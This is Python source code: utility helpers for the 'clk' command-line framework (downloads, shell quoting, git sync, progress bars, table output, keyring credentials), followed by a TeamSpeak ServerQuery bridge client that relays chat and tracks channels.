outfile = open(outpath, 'wb')
try:
with progressbar(length=size, label='Downloading %s' % os.path.basename(url)) as bar:
chunk = r.read(1024)
while chunk:
outfile.write(chunk)
bar.update(1024)
chunk = r.read(1024)
except BaseException:
outfile.close()
rm(outpath)
raise
outfile.close()
if sha256 is not None:
LOGGER.debug('Checking for corruption')
if hashlib.sha256(open(outpath, 'rb').read()).hexdigest() != sha256:
rm(outpath)
raise click.ClickException('The file at {} was corrupted. It was removed'.format(outpath))
if mode is not None:
os.chmod(outpath, mode)
return Path(outpath)
def part_of_day():
import datetime
hour = datetime.datetime.now().hour
if hour < 11:
return 'morning'
elif 11 <= hour < 13:
return 'lunch'
elif 13 <= hour < 17:
return 'afternoon'
elif 17 <= hour < 18:
return 'tea'
else:
return 'night'
def pid_exists(pidpath):
"""Check whether a program is running or not, based on its pid file"""
LOGGER.develop('Checking %s' % pidpath)
running = False
if os.path.exists(pidpath):
with open(pidpath) as f:
pid = int(f.readline().strip())
try:
import psutil
running = psutil.pid_exists(pid)
if running:
proc = psutil.Process(pid)
running = proc.status() != psutil.STATUS_ZOMBIE
except ImportError:
LOGGER.warn("Can't check the program is actually running. Please install psutils.")
# pid file still exists, so lets say rest is running
running = True
return running
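# Illustrative sketch: write the pid of the current process to a hypothetical pid
# file and check it; pid_exists should report it as running (and it falls back to
# True when psutil is not installed).
def _example_pid_exists():
    with tempdir() as d:
        pidpath = d / 'demo.pid'
        createfile(pidpath, str(os.getpid()))
        assert pid_exists(pidpath)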
def pid_kill(pidpath, signal=signal.SIGTERM):
"""Send a signal to a process, based on its pid file"""
LOGGER.develop('Checking %s' % pidpath)
if os.path.exists(pidpath):
pid = int(read(pidpath))
LOGGER.action('kill -{} {}'.format(signal, pid))
os.kill(pid, signal)
_find_unsafe = re.compile(r'[^\w@%+=:,./-]').search
def single_quote(s):
"""Return a shell-escaped version of the string *s*."""
if not s:
return "''"
if _find_unsafe(s) is None:
return s
# use single quotes, and put single quotes into double quotes
# the string $'b is then quoted as '$'"'"'b'
return "'" + s.replace("'", "'\"'\"'") + "'"
def double_quote(s):
'''Return a shell-escaped version of the string *s*.'''
if not s:
return '""'
if _find_unsafe(s) is None:
return s
# use double quotes, and put double quotes into single quotes
# the string $"b is then quoted as "$"'"'"b"
return '"' + s.replace('"', '"\'"\'"') + '"'
def quote(s):
"""Quote a string, with either single or double quotes depending on the content"""
sq = single_quote(s)
dq = double_quote(s)
return sq if len(sq) <= len(dq) else dq
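# Illustrative sketch: quote() leaves safe strings untouched and otherwise picks
# whichever of single_quote/double_quote gives the shorter result.
def _example_quote():
    assert quote('plain-word.txt') == 'plain-word.txt'
    assert quote('hello world') == "'hello world'"
    assert quote("it's") == '"it\'s"'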
def echo_key_value(k, v, alt_style={'dim': True}):
"""Print a key and its associated value with a common style"""
click.echo('%s %s' % (k, click.style(v, **alt_style)))
def echo_json(v):
"""Print a value as formatted and colored json"""
click.echo(colorize_json(v), nl=False)
def colorize_json(v):
"""Format and colorize in json"""
from pygments import formatters, highlight, lexers
return highlight(json_dumps(v), lexers.JsonLexer(), formatters.TerminalFormatter())
def ordered_unique(ls):
"""Return the list with unique elements while keeping the elements ordered by first appearance"""
seen = set()
return [elem for elem in ls if not (elem in seen or seen.add(elem))]
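# Illustrative sketch: duplicates are dropped while the first-seen order is kept.
def _example_ordered_unique():
    assert ordered_unique([3, 1, 3, 2, 1]) == [3, 1, 2]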
def git_sync(url,
directory,
commit_ish='master',
extra_branches=(),
force=False,
push_url=None,
quiet=False,
last_tag=False,
reset=False,
use_shallow=False):
"""Retrieve and/or update a git repository"""
version = re.search('git version (.+)', safe_check_output(['git', '--version'], internal=True)).group(1)
use_shallow = use_shallow and parse_version(version) >= parse_version('2.1.4') and not last_tag
directory = os.path.abspath(directory or re.split('[:/]', url)[-1])
git_dir = os.path.join(directory, '.git')
ref_file = os.path.abspath(f'{directory}/.git/clk-git-sync-reference')
updated = False
quiet = ['--quiet'] if quiet else []
parent = os.path.dirname(directory)
if not os.path.exists(parent):
makedirs(parent)
if force and os.path.exists(directory):
rm(directory)
if os.path.exists(directory):
assert os.path.exists(git_dir), ('Want to git sync {} in {} but {}'
' already exists and is not a git root'.format(url, directory, directory))
with cd(directory):
if reset:
call(['git', 'reset', '--hard'] + quiet)
call(['git', 'remote', 'set-url', 'origin', url])
# always fetch, just in case something went missing
call(['git', 'fetch', '--tags'] + quiet)
if os.path.exists(ref_file) and open(ref_file).read() != commit_ish:
# reference has changed. Unfortunately we can't continue with the single branch shallow repository
call(['git', 'remote', 'set-branches', 'origin', '*'])
if os.path.exists(f'{directory}/.git/shallow'):
call(['git', 'fetch', '--unshallow', '--tags'] + quiet)
prevrev = check_output(['git', 'rev-parse', 'HEAD'], internal=True)
# just to make sure the user hasn't done anything by himself
if commit_ish:
call(['git', 'checkout'] + quiet + [commit_ish])
if check_output(['git', 'rev-parse', '--abbrev-ref', 'HEAD'], internal=True).strip() != 'HEAD':
# not in a detached head, ok, we can use pull
call(['git', 'pull'] + quiet)
updated = prevrev != check_output(['git', 'rev-parse', 'HEAD'], internal=True)
else:
commit_ish = commit_ish or 'master'
ref_exists = check_output(['git', 'ls-remote', url, commit_ish], internal=True).strip() != ''
if ref_exists:
call(['git', 'clone'] + quiet + (['--depth', '1'] if use_shallow else []) +
['-b', commit_ish, url, directory])
else:
call(['git', 'clone'] + quiet + ['-n', url, directory])
with cd(directory):
call(['git', 'checkout', commit_ish])
if extra_branches:
with cd(directory):
call(['git', 'remote', 'set-branches', '--add', 'origin'] + list(extra_branches))
call(['git', 'fetch'] + quiet)
# save the reference used, so we can compare it with the asked reference in case of update
if commit_ish:
createfile(ref_file, commit_ish)
if push_url:
with cd(directory):
call(['git', 'remote', 'set-url', '--push', 'origin', push_url])
if last_tag:
with cd(directory):
tag = check_output(['git', 'describe', '--tags', '--abbrev=0']).strip()
call(['git', 'checkout'] + quiet + [tag])
return updated
def get_option_choices(option_name):
"""Returns the choices available for an option in the current context
This is useful to avoid duplicating the choice list."""
context = click_get_current_context_safe()
if not context or not hasattr(context, 'command'):
return ()
options = [o for o in context.command.params if o.name == option_name]
if not options:
return ()
fields = options[0]
if not isinstance(fields.type, click.Choice):
return ()
return fields.type.choices
def clear_ansi_color_codes(v):
"""make sure we don't have any terminal chars"""
if isinstance(v, str):
v = colorama.AnsiToWin32.ANSI_CSI_RE.sub('', v)
v = colorama.AnsiToWin32.ANSI_OSC_RE.sub('', v)
return v
def get_tabulate_formats():
import tabulate
return click.Choice(list(tabulate._table_formats.keys()) + ['csv', 'json', 'key_value', 'json-map', 'json-maps'])
def get_key_values_formats():
return get_tabulate_formats()
def progressbar(iterable=None,
length=None,
label=None,
show_eta=True,
show_percent=None,
show_pos=False,
item_show_func=None,
fill_char='#',
empty_char='-',
bar_template='%(label)s [%(bar)s] %(info)s',
info_sep=' ',
width=36,
file=sys.stderr,
color=None,
clear=True,
disabled=False):
"""This function creates an iterable context manager that can be used
to iterate over something while showing a progress bar. It will
either iterate over the `iterable` or `length` items (that are counted
up). While iteration happens, this function will print a rendered
    progress bar to the given `file` (which defaults to stderr here) and will attempt
to calculate remaining time and more. By default, this progress bar
will not be rendered if the file is not a terminal.
The context manager creates the progress bar. When the context
manager is entered the progress bar is already displayed. With every
iteration over the progress bar, the iterable passed to the bar is
advanced and the bar is updated. When the context manager exits,
a newline is printed and the progress bar is finalized on screen.
No printing must happen or the progress bar will be unintentionally
destroyed.
Example usage::
with progressbar(items) as bar:
for item in bar:
do_something_with(item)
Alternatively, if no iterable is specified, one can manually update the
progress bar through the `update()` method instead of directly
iterating over the progress bar. The update method accepts the number
of steps to increment the bar with::
with progressbar(length=chunks.total_bytes) as bar:
for chunk in chunks:
process_chunk(chunk)
bar.update(chunks.bytes)
.. versionadded:: 2.0
.. versionadded:: 4.0
Added the `color` parameter. Added a `update` method to the
progressbar object.
:param iterable: an iterable to iterate over. If not provided the length
is required.
:param length: the number of items to iterate over. By default the
progressbar will attempt to ask the iterator about its
length, which might or might not work. If an iterable is
also provided this parameter can be used to override the
length. If an iterable is not provided the progress bar
will iterate over a range of that length.
:param label: the label to show next to the progress bar.
:param show_eta: enables or disables the estimated time display. This is
automatically disabled if the length cannot be
determined.
:param show_percent: enables or disables the percentage display. The
default is `True` if the iterable has a length or
`False` if not.
:param show_pos: enables or disables the absolute position display. The
default is `False`.
:param item_show_func: a function called with the current item which
can return a string to show the current item
next to the progress bar. Note that the current
item can be `None`!
:param fill_char: the character to use to show the filled part of the
progress bar.
:param empty_char: the character to use to show the non-filled part of
the progress bar.
:param bar_template: the format string to use as template for the bar.
The parameters in it are ``label`` for the label,
``bar`` for the progress bar and ``info`` for the
info section.
:param info_sep: the separator between multiple info items (eta etc.)
:param width: the width of the progress bar in characters, 0 means full
terminal width
:param file: the file to write to. If this is not a terminal then
only the label is printed.
:param color: controls if the terminal supports ANSI colors or not. The
default is autodetection. This is only needed if ANSI
codes are included anywhere in the progress bar output
which is not the case by default.
"""
if disabled:
return null_context
color = click.termui.resolve_color_default(color)
return ProgressBar(iterable=iterable,
length=length,
show_eta=show_eta,
show_percent=show_percent,
show_pos=show_pos,
item_show_func=item_show_func,
fill_char=fill_char,
empty_char=empty_char,
bar_template=bar_template,
info_sep=info_sep,
file=file,
label=label,
width=width,
color=color,
clear=clear)
class ProgressBar(ProgressBar_):
def __init__(self, clear=True, *args, **kwargs):
self.clear = clear
kwargs.setdefault('file', sys.stderr)
ProgressBar_.__init__(self, *args, **kwargs)
def render_finish(self):
if self.is_hidden:
return
if self.clear and platform.system() != 'Windows':
AFTER_BAR = '\r\033[2K\033[?25h'
self.file.write(AFTER_BAR)
self.file.flush()
else:
ProgressBar_.render_finish(self)
def __iter__(self):
self.render_progress()
return self
def __next__(self):
if self.is_hidden:
return next(self.iter)
try:
rv = next(self.iter)
self.current_item = rv
except StopIteration:
self.finish()
self.render_progress()
if not self.entered:
self.render_finish()
raise StopIteration()
else:
self.update(1)
return rv
def get_close_matches(words, possibilities, n=3, cutoff=0.6):
"""Use SequenceMatcher to return list of the best "good enough" matches.
    words is a sequence for which close matches are desired (typically a
    string), or a list of such sequences.
possibilities is a list of sequences against which to match word
(typically a list of strings).
Optional arg n (default 3) is the maximum number of close matches to
return. n must be > 0.
Optional arg cutoff (default 0.6) is a float in [0, 1]. Possibilities
that don't score at least that similar to word are ignored.
The best (no more than n) matches among the possibilities are returned
in a list, sorted by similarity score, most similar first.
>>> get_close_matches("appel", ["ape", "apple", "peach", "puppy"])
['apple', 'ape']
>>> import keyword as _keyword
>>> get_close_matches("wheel", _keyword.kwlist)
['while']
>>> get_close_matches("apple", _keyword.kwlist)
[]
>>> get_close_matches("accept", _keyword.kwlist)
['except']
"""
if not n > 0:
raise ValueError('n must be > 0: %r' % (n, ))
if not 0.0 <= cutoff <= 1.0:
raise ValueError('cutoff must be in [0.0, 1.0]: %r' % (cutoff, ))
if not isinstance(words, list):
words = [words]
result = []
s = difflib.SequenceMatcher()
for word in words:
s.set_seq2(word)
for x in possibilities:
s.set_seq1(x)
if s.real_quick_ratio() >= cutoff and \
s.quick_ratio() >= cutoff and \
s.ratio() >= cutoff:
result.append((s.ratio(), x))
# Move the best scorers to head of list
result = heapq.nlargest(n, result)
# Strip scores for the best n matches
return [x for score, x in result]
def json_dump_file(path, content, internal=False):
"""Dump a python object to a file using a nicely formated json format"""
createfile(path, json_dumps(content), internal=internal)
def json_dumps(content):
"""Dump a python object using a nicely formated json format"""
return json.dumps(content, indent=4, sort_keys=True).replace(' \n', '\n') + '\n'
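# Illustrative sketch: keys are sorted, the indentation is 4 spaces and the
# result always ends with a newline.
def _example_json_dumps():
    assert json_dumps({'b': 2, 'a': 1}) == '{\n    "a": 1,\n    "b": 2\n}\n'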
def grep(
file_list,
args=None,
pager=True,
):
args = args or []
args = [quote(arg) for arg in args]
color_opt = ['--color=always'] if sys.stdout.isatty() else []
xargs = subprocess.Popen('xargs -0 grep ' + ' '.join(color_opt + list(args)) + (' | less' if pager else ''),
stdin=subprocess.PIPE,
shell=True)
xargs.communicate(input='\0'.join(file_list).encode('utf-8'))
xargs.wait()
class NullContext:
def __enter__(self):
pass
def __exit__(self, exc_type, exc_val, exc_tb):
pass
def update(self, foo):
"""Fake update method to mimic the progress bar API"""
pass
null_context = NullContext()
class Spinner(object):
spinner_cycle = itertools.cycle(['-', '\\', '|', '/'])
def __init__(self, message=''):
self.stop_running = None
self.spin_thread = None
self.message = message
def start(self):
if sys.stderr.isatty():
if self.message:
sys.stderr.write(self.message + ' ')
self.stop_running = threading.Event()
self.spin_thread = threading.Thread(target=self.init_spin)
self.spin_thread.start()
elif self.message:
LOGGER.status(self.message)
def stop(self):
if self.spin_thread:
self.stop_running.set()
self.spin_thread.join()
if self.message:
sys.stderr.write('\b' * (len(self.message) + 1))
sys.stderr.write(' ' * (len(self.message) + 2))
sys.stderr.write('\b' * (len(self.message) + 2))
sys.stderr.flush()
def init_spin(self):
while not self.stop_running.is_set():
sys.stderr.write(next(self.spinner_cycle))
sys.stderr.flush()
time.sleep(0.25)
sys.stderr.write('\b')
sys.stderr.flush()
def __enter__(self):
self.start()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.stop()
return False
def update(self, foo):
"""Fake update method to mimic the progress bar API"""
pass
def spinner(disabled=False, message=''):
if disabled:
return null_context
return Spinner(message)
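# Illustrative sketch: spinner() is used as a context manager around a slow call;
# it animates on a tty and degrades to a simple status message otherwise.
def _example_spinner():
    with spinner(message='thinking'):
        time.sleep(0.2)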
def read(f):
"""Read a file an return its content in utf-8"""
return open(f, 'rb').read().decode('utf-8')
def natural_delta(value):
"""Given a timedelta or a number of seconds, return a natural
representation of the amount of time elapsed. This is similar to
``natural_time``, but does not add tense to the result."""
date, delta = date_and_delta(value)
if date is None:
return value
seconds = abs(delta.seconds)
hours = seconds // 3600
seconds = seconds % 3600
minutes = seconds // 60
seconds = seconds % 60
days = abs(delta.days)
years = days // 365
days = days % 365
if years:
return '%s year%s %s day%s' % (years, 's' if years > 1 else '', days, 's' if days > 1 else '')
elif days:
return '%s day%s %s hour%s' % (days, 's' if days > 1 else '', hours, 's' if hours > 1 else '')
elif hours:
return '%s hour%s %s minute%s' % (hours, 's' if hours > 1 else '', minutes, 's' if minutes > 1 else '')
elif minutes:
return '%s minute%s %s second%s' % (minutes, 's' if minutes > 1 else '', seconds, 's' if seconds > 1 else '')
elif delta.microseconds:
seconds = seconds + abs(delta.microseconds) / 10.**6
return '%1.3f second%s' % (seconds, 's' if seconds > 1 else '')
return '%s second%s' % (seconds, 's' if seconds > 1 else '')
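# Illustrative sketch: natural_delta accepts either a number of seconds or a
# datetime.timedelta and renders the two most significant units.
def _example_natural_delta():
    assert natural_delta(42) == '42 seconds'
    assert natural_delta(3600 + 120) == '1 hour 2 minutes'
    assert natural_delta(datetime.timedelta(days=400)) == '1 year 35 days'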
def natural_time(value, future=False, months=True):
"""Given a datetime or a number of seconds, return a natural representation
of that time in a resolution that makes sense. This is more or less
compatible with Django's ``naturaltime`` filter. ``future`` is ignored for
datetimes, where the tense is always figured out based on the current time.
If an integer is passed, the return value will be past tense by default,
unless ``future`` is set to True."""
from datetime import datetime, timedelta
import dateutil.tz
from humanize.time import _, naturaldelta
now = datetime.now(dateutil.tz.tzlocal())
date, delta = date_and_delta(value)
if date is None:
return value
# determine tense by value only if datetime/timedelta were passed
if isinstance(value, (datetime, timedelta)):
future = date > now
ago = _('%s from now') if future else _('%s ago')
delta = naturaldelta(delta, months)
if delta == _('a moment'):
return _('now')
return ago % delta
def date_and_delta(value):
"""Turn a value into a date and a timedelta which represents how long ago
it was. If that's not possible, return (None, value)."""
from datetime import datetime, timedelta
import dateutil.tz
from humanize.time import _abs_timedelta
now = datetime.now(dateutil.tz.tzlocal())
if isinstance(value, datetime):
date = value
delta = now - value
elif isinstance(value, timedelta):
date = now - value
delta = value
else:
try:
value = int(value)
delta = timedelta(seconds=value)
date = now - delta
except (ValueError, TypeError):
return (None, value)
return date, _abs_timedelta(delta)
def read_cmakecache(file):
content = open(file).read()
return dict(re.findall('^([a-zA-Z_]+)(?::[^=]+=)(.+)$', content, flags=re.MULTILINE))
class ParameterType(click.ParamType):
def __init__(self):
click.ParamType.__init__(self)
if not hasattr(self, 'name'):
self.name = self.__class__.__name__
if self.name.endswith('Type'):
self.name = self.name[:-len('Type')]
if not self.name:
class_name = self.__class__.__name__
self.name = re.sub('(Param(eter|)|)Type$', '', class_name)
# switch to snake case
self.name = re.sub('([a-z])([A-Z])', '\\1_\\2', self.name).lower()
# remove the prefix if it match the module
self.name = re.sub('^%s(_|)' % self.__module__.split('.')[-1].lower(), '', self.name)
@contextmanager
def json_file(location):
if (not os.path.exists(location) or open(location, 'r').read().strip() == ''):
open(location, 'w').write('{}')
values = json.load(open(location))
oldvalues = deepcopy(values)
yield values
if values != oldvalues:
json.dump(values, open(location, 'w'))
def flat_map(elem):
"""Transform a list of list in a list with all the elements of the nested lists
>>> flat_map([[1, 2, 3], [4, 5]])
[1, 2, 3, 4, 5]
"""
elem = list(elem)
return functools.reduce(list.__add__, elem) if elem else []
def subkwargs(kwargs, params):
return {key: value for key, value in kwargs.items() if key in params}
def deprecated_module(src, dst):
stack = traceback.extract_stack()
def get_frame_info(frame):
filename = frame.filename
lineno = frame.lineno
line = frame.line
return filename, lineno, line
# find a relevant frame
frame = [
frame for frame in stack[:-2]
if 'frozen' not in get_frame_info(frame)[0] and 'pluginbase' not in get_frame_info(frame)[0]
][-1]
filename, lineno, line = get_frame_info(frame)
return ("{}:{} '{}' =>"
' Importing {} is deprecated, import {} instead').format(filename, lineno, line, src, dst)
class TablePrinter(object):
direct_output_formats = ['key_value', 'csv']
def __init__(self, fields=(), tablefmt=None, separator=' ', headers=(), **options):
fields = fields or self.fields_from_context()
headers = headers or self.headers_from_context()
self._tablefmt = tablefmt or self.format_from_context() or 'simple'
self._options = options
self._headers = fields or headers
self._separator = separator
self._data = []
self._field_indices = [headers.index(f) for f in fields]
@staticmethod
def headers_from_context():
return get_option_choices('fields')
@staticmethod
def fields_from_context():
context = click_get_current_context_safe()
if not context or not hasattr(context, 'params'):
return ()
return context.params.get('fields', ())
@staticmethod
def format_from_context():
context = click_get_current_context_safe()
if not context or not hasattr(context, 'params'):
return ()
return context.params.get('format', ())
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
if self._tablefmt not in self.direct_output_formats:
click.echo(tabulate(self._data, self._headers, tablefmt=self._tablefmt, **self._options))
def echo(self, *args, stripped=False):
if self._field_indices and not stripped:
args = [args[i] for i in self._field_indices]
cleaned_args = []
for arg in args:
if isinstance(arg, (tuple, list)):
arg = self._separator.join(arg)
cleaned_args.append(arg)
if self._tablefmt in self.direct_output_formats:
click.echo(tabulate([cleaned_args], self._headers, tablefmt=self._tablefmt, **self._options))
else:
self._data.append(cleaned_args)
def echos(self, ls):
for elem in ls:
self.echo(*elem)
def echo_records(self, records):
for record in records:
self.echo(*[record[value] for value in self.headers_from_context()])
def tabulate(tabular_data,
headers=(),
tablefmt='simple',
floatfmt='g',
numalign='decimal',
stralign='left',
missingval=''):
"""Tabulate the data"""
from tabulate import tabulate as tabulate_
if tablefmt == 'key_value':
from clk.config import config
data = []
for kv in tabular_data:
if len(kv) > 1:
data.append('%s %s' % (kv[0], click.style(u' '.join(to_string(v) for v in kv[1:]), **config.alt_style)))
else:
data.append(str(kv[0]))
return '\n'.join(data)
elif tablefmt == 'csv':
import csv
f = csv.StringIO()
csvwriter = csv.writer(f)
csvwriter.writerows(tabular_data)
f.seek(0)
return f.read().rstrip('\n')
elif tablefmt == 'json':
import collections
json_data = []
if not headers and tabular_data:
headers = ['key%s' % i for i in range(len(tabular_data[0]))]
for ls in tabular_data:
d = collections.OrderedDict()
for i, v in enumerate(ls):
if isinstance(v, str):
v = clear_ansi_color_codes(v)
d[headers[i]] = v
json_data.append(d)
return colorize_json(json_data)
elif tablefmt == 'json-map':
return colorize_json(
dict(
(d[0], clear_ansi_color_codes(str_join(' ', d[1:])) if len(d[1:]) > 1 else d[1]) for d in tabular_data))
elif tablefmt == 'json-maps':
import collections
json_data = {}
if not headers and tabular_data:
headers = ['key%s' % i for i in range(len(tabular_data[0]))]
for ls in tabular_data:
d = collections.OrderedDict()
for i, v in enumerate(ls[1:]):
v = clear_ansi_color_codes(v)
d[headers[i + 1]] = v
json_data[clear_ansi_color_codes(ls[0])] = d
return colorize_json(json_data)
elif tablefmt == 'plain':
return tabulate_(tabular_data, (), 'plain', floatfmt, numalign, stralign, missingval)
else:
return tabulate_(tabular_data, headers, tablefmt, floatfmt, numalign, stralign, missingval)
def str_join(sep, ls):
"""Return a joined string of all the members of the list converted in strings"""
return sep.join(str(elem) for elem in ls)
class AuthenticatorNotFound(click.UsageError):
def __init__(self, machine, *args, **kwargs):
super(AuthenticatorNotFound, self).__init__('User credentials required for machine {}.'.format(machine), *args,
**kwargs)
self.machine = machine
get_authenticator_hints = {}
def get_authenticator(machine, askpass=True, required=True):
login, password = None, None
netrc_keyring = False
try:
import keyring as _ # NOQA:F401
from clk.keyring_netrc import NetrcKeyring as Netrc
except ModuleNotFoundError:
from clk.netrc import Netrc
try:
keyring = get_keyring()
if isinstance(keyring, Netrc):
netrc_keyring = True
try:
login, password = json.loads(keyring.get_password('clk', machine))
except Exception:
netrc = get_netrc_keyring()
netrc_keyring = True
login, password = json.loads(netrc.get_password('clk', machine))
except Exception:
LOGGER.warning('I could not automatically find your login/password for {}.'.format(machine))
from clk import completion
if (login is None or password is None) and askpass and not completion.IN_COMPLETION:
LOGGER.info('Please enter your username and password for {}'.format(machine))
if machine in get_authenticator_hints:
LOGGER.info('Hint: {}'.format(get_authenticator_hints[machine]))
login = input('%s username: ' % machine)
password = getpass.getpass('%s password: ' % machine)
try:
LOGGER.info('Saving the credentials in your keyring: {}'.format(keyring.name))
keyring.set_password('clk', machine, json.dumps((login, password)))
except Exception:
LOGGER.warning('I could not save your credentials.')
if netrc_keyring:
LOGGER.warning('You can save them manually by running:'
' `passwords {} netrc-set {}`'.format(machine, login))
if login is None or password is None:
if required:
raise AuthenticatorNotFound(machine)
else:
return None
return login, password
def assert_main_module():
assert main_module != '__main__', ('You cannot call the main module, for there is none.')
def call_me(*cmd):
assert_main_module()
return call([sys.executable, '-c', 'from {} import main; main()'.format(main_module)] + list(cmd))
def check_my_output(*cmd):
assert_main_module()
return safe_check_output([sys.executable, '-c', 'from {} import main; main()'.format(main_module)] + list(cmd))
def to_bool(s):
"""Converts a string to a boolean"""
from distutils.util import strtobool
return bool(strtobool(s))
def to_string(s):
if isinstance(s, str):
return s
return str(s)
def parsedatetime(value):
if isinstance(value, datetime.datetime):
return value, None
import parsedatetime as _parsedatetime
cal = _parsedatetime.Calendar()
return cal.parseDT(value, sourceTime=datetime.datetime.today())
def value_to_string(value):
return (' '.join(map(quote, value)) if type(value) is tuple else str(value) if value else '')
def is_port_available(port, hostname='127.0.0.1'):
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
result = s.connect_ex((hostname, port))
s.close()
return result != 0
def find_available_port(start_port, hostname='127.0.0.1'):
port = start_port
while not is_port_available(port, hostname):
port += 1
return port
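# Illustrative sketch: occupy a port with a listening socket, then ask
# find_available_port for a free port starting there; it has to skip at least
# the occupied one.
def _example_find_available_port():
    import socket
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(('127.0.0.1', 0))
    s.listen(1)
    taken = s.getsockname()[1]
    try:
        assert find_available_port(taken) > taken
    finally:
        s.close()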
|
TSConnection.py
|
import socket
import threading
import time
import copy
import traceback
from queue import Queue
class TSConnection:
_send_queue = Queue()
_recv_queue = Queue()
_connected = False
_running = False
_client_map = {}
_channel_map = {}
_log = None
_client_channel_moved = False
def __init__(self, server, port, nick, username, password):
self._server = server
self._port = port
self._nick = nick
self._username = username
self._password = password
self._socket = socket.socket()
def run(self):
self._log = open("ts.log", 'a', 1)
self._running = True
self.connect()
self._recv_thread = threading.Thread(target=self.listen)
self._recv_thread.start()
self._send_thread = threading.Thread(target=self.process_send_queue)
self._send_thread.start()
self._keep_alive_thread = threading.Thread(target=self.keepalive)
self._keep_alive_thread.start()
def keepalive(self):
while self._running:
if self._connected:
if(hasattr(self, "_botclid") and self._client_channel_moved == False):
# move the bot itself to channel 1
print("[TS] Moving myself to channel 1")
self._socket.send(
bytes("clientmove clid=%s cid=1\n" % (self._botclid,), 'UTF-8'))
self._client_channel_moved = True
self._socket.send(bytes("clientlist\n", 'UTF-8'))
self._socket.send(bytes("channellist\n", 'UTF-8'))
self._socket.send(
bytes("servernotifyregister event=channel id=1\n", 'UTF-8'))
time.sleep(1)
def connect(self):
print("[TS] Connecting...")
self._connected = False
try:
self._socket = socket.socket()
self._socket.connect((self._server, self._port))
self._socket.send(bytes("login %s %s\n" %
(self._username, self._password), 'UTF-8'))
self._socket.send(bytes("use 1\n", 'UTF-8'))
self._socket.send(
bytes("servernotifyregister event=textchannel id=1\n", 'UTF-8'))
self._socket.send(
bytes("servernotifyregister event=textserver id=1\n", 'UTF-8'))
self._socket.send(
bytes("servernotifyregister event=channel id=1\n", 'UTF-8'))
self._socket.send(
bytes("servernotifyregister event=server id=1\n", 'UTF-8'))
self._socket.send(
bytes("clientupdate client_nickname=%s\n" % self._nick, 'UTF-8'))
self._socket.send(
bytes("clientlist\n", 'UTF-8'))
print("[TS] Connected")
self._connected = True
        except Exception:
self._connected = False
print("connect to %s on port %s failed.\n" %
(self._server, self._port))
print(traceback.format_exc())
return
def listen(self):
while self._running:
try:
while not self._connected:
self.connect()
data = self._socket.recv(4096)
if len(data) == 0:
print("connection to %s lost. Attempting to reconnect...\n" % (
self._server, ))
self._connected = False
continue
data = data.decode("UTF-8")
                data = data.strip()
#print(data + "\n")
parts = data.split()
command = parts[0]
args = {}
for pair in parts[1:]:
bits = pair.partition("=")
args[bits[0]] = bits[2]
if command == "notifytextmessage":
msg = self.decode(args["msg"])
msg_from = self.decode(args["invokername"])
if msg_from.startswith("[Bridge]"):
continue
self._recv_queue.put(("MSG", msg_from, "", msg))
elif command == "notifycliententerview":
msg_from = self.decode(args["client_nickname"])
#self._client_map[args["clid"]]["client_nickname"] = msg_from
self._recv_queue.put(("CONNECT", msg_from, ""))
elif command == "notifyclientleftview":
msg_from = self.decode(self._client_map[args["clid"]]["client_nickname"])
del self._client_map[args["clid"]]
self._recv_queue.put(("QUIT", msg_from, ""))
elif command.startswith("cid"):
data = data.split("\n\r")[0]
for channel in data.split("|"):
args = {}
for pair in channel.split():
bits = pair.partition("=")
args[bits[0]] = bits[2]
if "cid" in args:
self._channel_map[args["cid"]] = args if not args["cid"] in self._channel_map else {
**self._channel_map[args["cid"]], **args}
elif command.startswith("clid"):
data = data.split("\n\r")[0]
                    # clear the previous per-channel member lists
for cid in self._channel_map:
self._channel_map[cid]["members"] = []
                    old_client_map = copy.deepcopy(self._client_map)  # keep the old client info to detect channel moves
for client in data.split("|"):
args = {}
for pair in client.split():
bits = pair.partition("=")
args[bits[0]] = bits[2]
if "clid" in args and "client_nickname" in args:
if args["client_nickname"] == self._nick:
self._botclid = args["clid"]
self._client_map[args["clid"]] = args
if args["cid"] in self._channel_map:
self._channel_map[args["cid"]]["members"].append(args["clid"])
                    # detect whether a client moved to another channel
for client in self._client_map.items():
client = client[1]
if client["client_nickname"] != self._nick and client["clid"] in old_client_map and client["cid"] != old_client_map[client["clid"]]["cid"]:
from_channel = self._channel_map[old_client_map[client["clid"]]["cid"]]
from_channel_name = self.get_channel_name_with_relation(from_channel)
to_channel = self._channel_map[client["cid"]]
to_channel_name = self.get_channel_name_with_relation(to_channel)
self._recv_queue.put(
("MOVE", self.decode(client["client_nickname"]),
from_channel_name, to_channel_name))
            except Exception:
print(traceback.format_exc())
def encode(self, data):
data = data.replace('\\', '\\\\')
data = data.replace('/', '\\/')
data = data.replace(' ', '\\s')
data = data.replace('|', '\\p')
data = data.replace('\n', '\\n')
data = data.replace('\r', '\\r')
data = data.replace('\t', '\\t')
return data
def decode(self, data):
data = data.replace('\\\\', '\\')
data = data.replace('\\/', '/')
data = data.replace('\\s', ' ')
data = data.replace('\\p', '|')
data = data.replace('\\a', '')
data = data.replace('\\b', '')
data = data.replace('\\f', '')
data = data.replace('\\n', '\n')
data = data.replace('\\r', '\r')
data = data.replace('\\t', ' ')
data = data.replace('\\v', '\n')
data = data.replace('[URL]', '')
data = data.replace('[/URL]', '')
return data
def relay_message(self, user, msg):
msg = self.encode(msg)
user = self.encode(user)
self.send_raw("clientupdate client_nickname=[Bridge]" + user)
self.send_raw("sendtextmessage targetmode=2 target=1 msg=" + msg)
self.send_raw("clientupdate client_nickname=" + self._nick)
def relay_global_message(self, user, msg):
msg = self.encode(msg)
user = self.encode(user)
self.send_raw("clientupdate client_nickname=[Bridge]" + user)
self.send_raw("sendtextmessage targetmode=3 target=1 msg=" + msg)
self.send_raw("clientupdate client_nickname=" + self._nick)
def send_text(self, text):
if not text:
return
text = self.encode(text)
self.send_raw("sendtextmessage targetmode=2 target=1 msg=" + text)
def send_raw(self, text):
msg = "%s\n" % (text, )
self._send_queue.put(msg)
def poll(self):
if self._recv_queue.empty():
return None
return self._recv_queue.get()
def process_send_queue(self):
while self._running:
if self._connected and not self._send_queue.empty():
self._socket.send(bytes(self._send_queue.get(), 'UTF-8'))
self._send_queue.task_done()
time.sleep(0.01)
def get_channel_name_with_relation(self, channel, channel_name=""):
if(channel["pid"] != "0"):
channel_name = " - " + self.decode(channel["channel_name"]) + channel_name
return self.get_channel_name_with_relation(self._channel_map[channel["pid"]], channel_name)
else:
return self.decode(channel["channel_name"]) + channel_name
def disconnect(self):
print("[TS] Disconnecting")
self._running = False
